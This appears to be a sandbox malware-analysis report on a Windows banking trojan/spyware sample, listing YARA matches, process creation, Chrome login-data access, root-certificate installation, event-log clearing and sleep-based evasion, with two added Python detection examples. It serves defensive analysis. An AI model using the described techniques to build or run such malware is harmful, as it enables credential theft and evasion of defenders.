        Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
        Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
        Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Chebka author = ditekSHen, description = Detects Chebka
        Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Generic_a681f24a reference_sample = a796f316b1ed7fa809d9ad5e9b25bd780db76001345ea83f5035a33618f927fa, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Generic, fingerprint = 6323ed5b60e728297de19c878cd96b429bfd6d82157b4cf3475f3a3123921ae0, id = a681f24a-7054-4525-bcf8-3ee64a1d8413, last_modified = 2021-08-23
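Most of the memory regions above trip SUSP_XORed_MSDOS_Stub_Message, which fires when the "This program cannot be run in DOS mode" string is present under a single-byte XOR (the YARA `xor` string modifier linked in the rule's reference). The following is an added example, not code from the report or from the rule's author, that reimplements that idea so an analyst can confirm a hit on a dumped region, recover the key and carve the encrypted PE header. The stub offset 0x4E is the one MSVC's linker emits and is an assumption for other toolchains; the sample buffer is constructed.

```python
"""Scan a memory region for the MS-DOS stub message under a single-byte XOR.

Added example, not part of the Joe Sandbox report and not the YARA rule's own
text: it reimplements the idea behind SUSP_XORed_MSDOS_Stub_Message so an
analyst can confirm a hit and recover the key from a process memory dump.
"""
from __future__ import annotations

import hashlib

STUB = b"This program cannot be run in DOS mode"
# Offset of the message inside the stub that MSVC's linker emits; used only as a
# heuristic to locate the start of the encrypted PE header (assumption: other
# linkers may place it elsewhere).
TYPICAL_STUB_OFFSET = 0x4E


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with the single-byte key."""
    return bytes(b ^ key for b in data)


def has_plaintext_stub(buf: bytes) -> bool:
    """A plaintext stub is what every normal PE carries; not suspicious by itself."""
    return STUB in buf


def find_xored_stub(buf: bytes) -> list[tuple[int, int]]:
    """Return (offset, key) wherever STUB appears XORed with a non-zero single-byte
    key. Single pass: the first byte fixes the only candidate key, the remaining
    bytes either confirm it or rule it out."""
    hits = []
    n = len(STUB)
    first = STUB[0]
    for i in range(len(buf) - n + 1):
        key = buf[i] ^ first
        if key == 0:
            continue  # plaintext occurrence; see has_plaintext_stub
        if all(buf[i + j] ^ key == STUB[j] for j in range(1, n)):
            hits.append((i, key))
    return hits


def carve_candidate(buf: bytes, stub_offset: int, key: int) -> bytes:
    """Decode from the presumed 'MZ' header to the end of the buffer with the
    recovered key, so the result can be handed to a PE parser."""
    start = max(0, stub_offset - TYPICAL_STUB_OFFSET)
    return xor_bytes(buf[start:], key)


def verdict(buf: bytes) -> dict:
    """Approximation of the rule's logic: suspicious when the message occurs
    only in XORed form. A region holding an already-unpacked PE also carries
    the plaintext stub, so inspect such regions with find_xored_stub directly."""
    hits = find_xored_stub(buf)
    return {
        "suspicious": bool(hits) and not has_plaintext_stub(buf),
        "hits": hits,
        "sha256": hashlib.sha256(buf).hexdigest(),
    }


# Constructed sample: junk, then a fake PE header ('MZ', padding, stub message)
# XOR-encrypted with key 0x5A, the way a packer might stage its payload.
FAKE_PE = b"MZ" + b"\x00" * (TYPICAL_STUB_OFFSET - 2) + STUB
SAMPLE = b"\x11\x22\x33\x44" + xor_bytes(FAKE_PE, 0x5A)

if __name__ == "__main__":
    result = verdict(SAMPLE)
    for offset, key in result["hits"]:
        carved = carve_candidate(SAMPLE, offset, key)
        print(f"stub at 0x{offset:x}, key 0x{key:02x}, decoded header starts {carved[:2]!r}")
    print("suspicious:", result["suspicious"])
```

Run it against a `.sdmp` region by reading the file into `buf` and calling `verdict(buf)`; a hit whose carved bytes start with `MZ` is a strong sign of a staged, XOR-encrypted payload rather than a coincidental string. The pure-Python scan is adequate for regions of a few megabytes; for whole-process dumps, YARA itself with the `xor` modifier is the faster tool.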
        Source: C:\Windows\System32\wbem\WMIADAP.exe | File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h
        Source: C:\Windows\System32\wbem\WMIADAP.exe | File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
        Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000022BAF57B6C0 appears 38 times
        Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000022BAF57B860 appears 40 times
        Source: C:\Windows\System32\svchost.exe | Code function: String function: 0000022BAF57B6D0 appears 31 times
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04646780 GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, 5_2_04646780
        Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.db
        Source: classification engine | Classification label: mal100.bank.troj.spyw.evad.winEXE@11/6@4/8
        Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04643750 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 5_2_04643750
        Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe:Zone.Identifier
        Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" -h
        Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
        Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
        Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k WspService
        Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
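The process tree above has three features worth turning into telemetry rules: rundll32.exe loading a DLL out of the user's Temp directory, svchost.exe being spawned by another svchost.exe with a `-k` group the host does not normally use, and processes whose parent the sandbox reports as "unknown", which is how a Win32_Process::Create call through WMI looks (on a live host the child sits under WmiPrvSE.exe). The following is an added example, not part of the report: the events are constructed from the "Process created" lines, the parent of the first rundll32.exe is an assumption (the report says "unknown"), and the service-group baseline is a placeholder that should be taken from a clean reference build.

```python
"""Triage rules for the process tree a sample like this one produces.

Added example, not part of the report. Events are constructed from the
report's "Process created" lines; parent images marked "assumed" are not
stated in the report. Field names loosely mirror Sysmon Event ID 1.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str
    cmdline: str
    parent_image: str


# Service groups expected on the monitored host. Placeholder for the demo; in
# production enumerate HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
# on a clean reference build and keep that list as the baseline.
KNOWN_SVCHOST_GROUPS = {
    "netsvcs", "LocalService", "NetworkService", "DcomLaunch", "RPCSS",
    "LocalSystemNetworkRestricted", "LocalServiceNoNetwork",
    "LocalServiceNetworkRestricted", "UnistackSvcGroup",
}

USER_TEMP = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.IGNORECASE)
SVCHOST_GROUP = re.compile(r"(?:^|\s)-k\s+(\S+)", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(ev: ProcEvent) -> list[str]:
    """Return the heuristics the event trips (empty list for benign)."""
    findings: list[str] = []
    image, parent = basename(ev.image), basename(ev.parent_image)

    # rundll32 handed a DLL that lives in a user-writable Temp directory
    if image == "rundll32.exe" and USER_TEMP.search(ev.cmdline):
        findings.append("rundll32 loading a DLL from %LOCALAPPDATA%\\Temp")

    # Service hosts are started by services.exe; anything else deserves a look.
    # A few Windows components are legitimate exceptions, so treat this as a
    # signal to enrich with image path and -k group, not as a verdict.
    if image == "svchost.exe":
        if parent != "services.exe":
            findings.append(f"svchost.exe not started by services.exe (parent {parent})")
        m = SVCHOST_GROUP.search(ev.cmdline)
        if m and m.group(1) not in KNOWN_SVCHOST_GROUPS:
            findings.append(f"svchost.exe with service group '{m.group(1)}' outside the baseline")

    # Process creation via WMI shows up as a child of the WMI provider host
    if parent == "wmiprvse.exe":
        findings.append("process created through WMI (parent WmiPrvSE.exe)")
    return findings


def triage_all(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Events that tripped at least one heuristic, paired with their findings."""
    return [(ev, f) for ev in events if (f := triage(ev))]


# Constructed events mirroring the report's process tree.
EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\file.exe",
              r'"C:\Users\user\Desktop\file.exe" -h',
              r"C:\Users\user\Desktop\file.exe"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r'rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open',
              r"C:\Windows\System32\wbem\WmiPrvSE.exe"),            # assumed parent
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe",
              r'rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open',
              r"C:\Windows\System32\rundll32.exe"),
    ProcEvent(r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\system32\svchost.exe -k WspService",
              r"C:\Windows\System32\svchost.exe"),
    ProcEvent(r"C:\Windows\System32\svchost.exe",                   # benign control
              r"C:\Windows\system32\svchost.exe -k netsvcs -p",
              r"C:\Windows\System32\services.exe"),
]

if __name__ == "__main__":
    for ev, findings in triage_all(EVENTS):
        print(basename(ev.image), "<-", basename(ev.parent_image))
        for f in findings:
            print("   ", f)
```

The svchost rule is deliberately two-part: the parent check alone has known benign exceptions, but a non-services.exe parent combined with a `-k` group absent from the host's Svchost registry key is rare enough to page on. Feed real events in by mapping your EDR's image, command-line and parent-image fields onto `ProcEvent`.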
        Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0464AC90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 5_2_0464AC90
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0464AD30 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 5_2_0464AD30
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF54DB00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle, 7_2_0000022BAF54DB00
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF54DBB0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 7_2_0000022BAF54DBB0
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF57B018 AdjustTokenPrivileges,CreateDIBSection, 7_2_0000022BAF57B018
        Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Windows\System32\svchost.exe | WMI Queries: Provider::ExecMethod - CIMWin32 : Win32_Process::Create
        Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\db.dat
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF533440 CoCreateInstance,SysFreeString,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 7_2_0000022BAF533440
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_046348F0 LocalAlloc,GetLogicalDriveStringsW,GetVolumeInformationW,SHGetFileInfoW,lstrlenW,lstrlenW,GetDiskFreeSpaceExW,GetDriveTypeW,lstrlenW,SHGetSpecialFolderPathW,SHGetSpecialFolderPathW,lstrlenW,lstrlenW,SHGetSpecialFolderPathW,lstrlenW,lstrlenW,lstrlenW,LocalSize,LocalSize,LocalSize,LocalReAlloc,LocalSize,LocalSize,LocalFree,LocalFree,LocalFree,LocalFree, 5_2_046348F0
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: svchost.exe, 00000009.00000003.444410905.00000244FE39D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04645CA0 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification, 5_2_04645CA0
        Source: unknown | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_01
        Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
        Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
        Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
        Source: C:\Windows\System32\wbem\WMIADAP.exe | Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
        Source: C:\Users\user\Desktop\file.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\file.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402911 push ecx; ret 0_2_00402924
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_046567F6 push ecx; ret 5_2_04656809
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF57DEDE push rbx; ret 7_2_0000022BAF57DEDF
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF57BD61 push rbp; retf 7_2_0000022BAF57BD64
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF47341A push ecx; ret 7_2_0000022BAF473435
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF473382 push es; iretd 7_2_0000022BAF473383
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF472A31 push ebp; ret 7_2_0000022BAF472A4B
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF474A39 push esi; ret 7_2_0000022BAF474A47
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF4746DB push ds; ret 7_2_0000022BAF474705
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF471E6B push esp; ret 7_2_0000022BAF471E89
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF4715C1 pushad ; ret 7_2_0000022BAF4715C5
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040AF60 LoadLibraryA,GetProcAddress,_memset,ShellExecuteExW, 0_2_0040AF60
        Source: file.exe | Static PE information: real checksum: 0x160d1 should be: 0x142ca

        Persistence and Installation Behavior

        Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Windows\System32\svchost.exe | WMI Queries: Provider::ExecMethod - CIMWin32 : Win32_Process::Create
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive0 5_2_04646780
        Source: C:\Windows\System32\svchost.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\844918F60F939B112F07B402C479421800EB2CD5 Blob
        Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\db.dll

        Boot Survival

        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04646780 GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive0
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04643750 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0463A010 ClearEventLogW,OpenEventLogA,ClearEventLogW,CloseEventLog
        Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5HQ15BTC-BI2Q-S1J7-YRC6-SZJY3C3CP8J7}\650478DC7424C37C 1
        Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wbem\WMIADAP.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Windows\System32\svchost.exe | System information queried: FirmwareTableInformation
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0464C460 GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,StrStrIW,CreateThread,CreateThread,CloseHandle,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF54F840 GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,CreateThread,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle
        Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04633C30
        Source: C:\Windows\System32\svchost.exe | Code function: 7_2_0000022BAF534410
        Source: C:\Users\user\Desktop\file.exe TID: 5492 | Thread sleep time: -30000s >= -30000s
        Source: C:\Users\user\Desktop\file.exe TID: 4852 | Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5140 | Thread sleep count: 242 > 30
        Source: C:\Windows\System32\svchost.exe TID: 772 | Thread sleep count: 843 > 30
        Source: C:\Windows\System32\svchost.exe TID: 772 | Thread sleep time: -42150s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6120 | Thread sleep count: 47 > 30
        Source: C:\Windows\System32\svchost.exe TID: 6120 | Thread sleep time: -47000s >= -30000s
        Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 4864 | Thread sleep count: 2696 > 30
        Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 4864 | Thread sleep count: 2400 > 30
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
